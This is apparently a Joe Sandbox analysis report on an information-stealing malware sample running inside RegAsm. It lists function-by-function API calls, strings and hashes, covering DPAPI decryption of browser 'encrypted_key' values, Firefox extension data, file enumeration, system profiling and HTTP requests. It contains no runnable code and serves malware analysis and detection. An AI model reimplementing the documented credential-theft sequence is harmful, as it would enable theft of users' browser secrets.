??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

^userContextId=4294967295, xrefs: 0040D4D7
moz-extension+++, xrefs: 0040D4DD

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

"encrypted_key":", xrefs: 004081DF
DPAPI, xrefs: 0040821B
, xrefs: 00408241

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 00416896
ERROR, xrefs: 0041686B

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
